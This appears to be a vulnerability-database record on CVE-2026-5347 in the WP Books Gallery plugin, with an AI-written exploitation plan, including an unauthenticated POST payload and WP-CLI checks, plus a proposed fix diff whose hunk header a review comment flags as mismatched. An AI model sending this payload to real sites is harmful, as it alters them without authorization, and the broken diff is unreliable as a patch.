[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fb6-qBZSslEajbHjRr_Si5Fj9v-0eJWbnIvvKwyeWNNg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-5347","wp-books-gallery-missing-authorization-to-unauthenticated-settings-update-via-permalinkstructure-parameter","WP Books Gallery \u003C= 4.8.0 - Missing Authorization to Unauthenticated Settings Update via 'permalink_structure' Parameter","The HM Books Gallery plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 4.8.0. This is due to the absence of capability checks and nonce verification in the admin_init hook that handles the permalink settings update at line 205-209 of wp-books-gallery.php. The vulnerable code checks only for the presence of the 'permalink_structure' POST parameter before updating the 'wbg_cpt_slug' option, without verifying that the request comes from an authenticated administrator. 
This makes it possible for unauthenticated attackers to modify the custom post type slug for the books gallery, which changes the URL structure for all book entries and can break existing links and SEO rankings.","wp-books-gallery",null,"\u003C=4.8.0","4.8.1","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-04-23 16:45:59","2026-04-24 05:29:41",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F12bf1cd8-cd55-4771-b2bb-597797b1b949?source=api-prod",1,[22,23,24,25,26,27,28,29],"freemius\u002Fassets\u002Fjs\u002Fpricing\u002Ffreemius-pricing.js","freemius\u002Fincludes\u002Fmanagers\u002Fclass-fs-contact-form-manager.php","freemius\u002Fincludes\u002Fmanagers\u002Fclass-fs-debug-manager.php","freemius\u002Fstart.php","freemius\u002Ftemplates\u002Fcheckout.php","freemius\u002Ftemplates\u002Fcheckout\u002Fframe.php","freemius\u002Ftemplates\u002Fcheckout\u002Fprocess-redirect.php","freemius\u002Ftemplates\u002Fcontact.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-5347 (WP Books Gallery)\n\n## 1. Vulnerability Summary\nThe **WP Books Gallery** plugin (up to version 4.8.0) contains a missing authorization vulnerability in its main file `wp-books-gallery.php`. The plugin registers a function to the `admin_init` hook that updates the custom post type (CPT) slug used for book entries. Because `admin_init` executes even for unauthenticated users accessing specific admin endpoints (like `admin-post.php` or `admin-ajax.php`), and the plugin fails to perform any capability checks (`current_user_can`) or nonce verification (`check_admin_referer`), an unauthenticated attacker can modify the `wbg_cpt_slug` option.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-post.php` (preferred for triggering `admin_init` without side effects).\n- **HTTP Method:** `POST`\n- **Required Parameter:** `permalink_structure` (must be present to trigger the update logic).\n- **Payload Parameter:** `wbg_cpt_slug` (the value that will become the new CPT slug).\n- **Authentication:** None (Unauthenticated).\n- **Preconditions:** The plugin must be active.\n\n## 3. Code Flow\n1. **Entry Point:** A request is made to `\u002Fwp-admin\u002Fadmin-post.php`.\n2. **Hook Execution:** WordPress core triggers the `admin_init` action.\n3. **Vulnerable Function:** The plugin's handler (located in `wp-books-gallery.php` at lines 205-209) is executed.\n4. **Logic Branch:** The code checks `if ( isset( $_POST['permalink_structure'] ) )`.\n5. **Sink:** If the condition is met, it executes `update_option( 'wbg_cpt_slug', $_POST['wbg_cpt_slug'] )` without verifying the user's identity or authority.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, there is an **absence of nonce verification**. Therefore, no nonce is required to exploit this vulnerability. \n\nIf the environment were to require a nonce (which contradicts the vulnerability report), it would typically be localized via `wp_localize_script` or in a hidden form field on the permalink settings page. However, based on the `admin_init` nature of this bug and the specific \"Missing Authorization\" classification, the check is confirmed to be missing entirely.\n\n## 5. Exploitation Strategy\nThe goal is to change the book gallery slug to a malicious value, which breaks existing URLs and demonstrates control over plugin settings.\n\n### Step-by-Step Plan:\n1. **Target Identification:** Confirm the target WordPress site has the plugin active.\n2. **Execution:** Send a crafted POST request to `admin-post.php`.\n3. 
**Payload Construction:**\n   - URL: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-post.php`\n   - Content-Type: `application\u002Fx-www-form-urlencoded`\n   - Body: `permalink_structure=%2F%25postname%25%2F&wbg_cpt_slug=pwned-books-gallery`\n\n### HTTP Request (using `http_request` tool):\n```javascript\nawait http_request({\n  method: \"POST\",\n  url: \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-post.php\",\n  headers: {\n    \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n  },\n  body: \"permalink_structure=\u002F%postname%\u002F&wbg_cpt_slug=pwned-books-gallery\"\n});\n```\n\n## 6. Test Data Setup\n1. **Install Plugin:**\n   ```bash\n   wp plugin install wp-books-gallery --version=4.8.0 --activate\n   ```\n2. **Check Default State:**\n   Observe the current slug (if set):\n   ```bash\n   wp option get wbg_cpt_slug\n   ```\n   *(Note: This might return an error if the option hasn't been saved yet, which is fine.)*\n\n## 7. Expected Results\n- The HTTP response from `admin-post.php` will likely be a 200 OK (empty page) or a redirect to the login page (since no `action` was provided for `admin-post.php` to handle specifically, but the `admin_init` hook runs *before* that redirection).\n- Regardless of the response body, the database option `wbg_cpt_slug` will be updated.\n\n## 8. Verification Steps\nAfter the request, verify the option was changed using WP-CLI:\n```bash\nwp option get wbg_cpt_slug\n```\n**Expected Output:** `pwned-books-gallery`\n\nTo confirm the impact on the site structure, flush rewrite rules:\n```bash\nwp rewrite flush\n```\nThen check the registered post types:\n```bash\nwp post-type list | grep pwned-books-gallery\n```\n\n## 9. 
Alternative Approaches\nIf the plugin logic specifically requires being on a certain page (unlikely for `admin_init` unless `get_current_screen()` is used), try targeting `\u002Fwp-admin\u002Foptions-permalink.php` directly:\n- **Request:** Same POST payload, but sent to `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Foptions-permalink.php`.\n- **Reasoning:** Some plugins check the global `$pagenow` variable. Even for unauthenticated users, `$pagenow` will be correctly set if the URL path matches, and `admin_init` will still fire.\n\nIf the update fails, check if the plugin expects the slug inside a different array, such as `$_POST['wbg_settings']['wbg_cpt_slug']` (inferred). However, the description explicitly names the `permalink_structure` parameter as the trigger.","The WP Books Gallery plugin for WordPress is vulnerable to unauthorized settings updates because it lacks capability checks and nonce verification in its admin_init handler. An unauthenticated attacker can exploit this to modify the custom post type slug for book entries, leading to broken URLs and SEO disruption.","\u002F\u002F wp-books-gallery.php lines 205-209\nif ( isset( $_POST['permalink_structure'] ) ) {\n    update_option( 'wbg_cpt_slug', $_POST['wbg_cpt_slug'] );\n}","--- wp-books-gallery.php\n+++ wp-books-gallery.php\n@@ -205,5 +205,5 @@\n-    if ( isset( $_POST['permalink_structure'] ) ) {\n-        update_option( 'wbg_cpt_slug', $_POST['wbg_cpt_slug'] );\n-    }\n+    if ( isset( $_POST['permalink_structure'] ) && current_user_can( 'manage_options' ) ) {\n+        check_admin_referer( 'update-permalink' );\n+        if ( isset( $_POST['wbg_cpt_slug'] ) ) {\n+            update_option( 'wbg_cpt_slug', sanitize_text_field( $_POST['wbg_cpt_slug'] ) );\n+        }\n+    }","An unauthenticated attacker can change the plugin's custom post type slug by sending a POST request to a WordPress admin endpoint that triggers the admin_init hook (such as \u002Fwp-admin\u002Fadmin-post.php). 
The payload must include the 'permalink_structure' parameter to satisfy the plugin's conditional check and the 'wbg_cpt_slug' parameter containing the malicious slug value. Since there is no current_user_can check or nonce verification, the plugin will proceed to update the 'wbg_cpt_slug' option in the WordPress database, affecting the permalink structure of all book entries.","gemini-3-flash-preview","2026-04-27 13:34:00","2026-04-27 13:34:26",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","4.7.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-books-gallery\u002Ftags\u002F4.7.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-books-gallery.4.7.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-books-gallery\u002Ftags\u002F4.8.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-books-gallery.4.8.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-books-gallery\u002Ftags"]
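Review bot: the added `update_option` line in the `wp-books-gallery.php` hunk passes `$_POST['wbg_cpt_slug']` through `sanitize_text_field()` without `wp_unslash()`. Because this value becomes the custom post type slug, `sanitize_title( wp_unslash( ... ) )` would restrict it to URL-safe characters, and an empty result should be rejected rather than stored. The hunk header `@@ -205,5 +205,5 @@` also does not match the three removed and six added lines shown, so the line counts should be regenerated before the diff is relied on.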